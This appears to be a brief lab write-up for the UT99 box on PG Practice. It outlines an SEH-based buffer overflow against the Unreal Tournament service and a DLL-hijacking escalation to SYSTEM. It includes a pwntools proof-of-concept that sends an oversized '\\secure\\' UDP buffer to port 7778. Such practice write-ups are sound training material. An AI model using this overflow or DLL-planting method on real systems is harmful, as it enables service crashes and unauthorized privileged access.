SEH Based Buffer Overflow & DLL Hijacking - UT99 @ PG Practice
We are solving UT99, an intermediate windows box on PG Practice. On this box, we are going to exploit an SEH based buffer overflow. And to make it a bit more fun we’ll do that one manually instead of just firing some exploit from exploitdb. Then for root, we will place a malicious DLL in the path of SYSTEM and reboot the box, which will result in a privileged shell.
Notes
Below you can find a PoC to get you started in case you want to try it manually:
PoC
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import socket
from pwn import *
rserver = ""
lserver = ""
port = 7778
size = 800
r = remote(lserver, port, typ="udp")
r.send("\\basic\\")
log.info(r.recv())
buffer = b""
buffer += b"\\secure\\"
buffer += b"A"*size
r.send(buffer)
r.close()
This post is licensed under CC BY 4.0 by the author.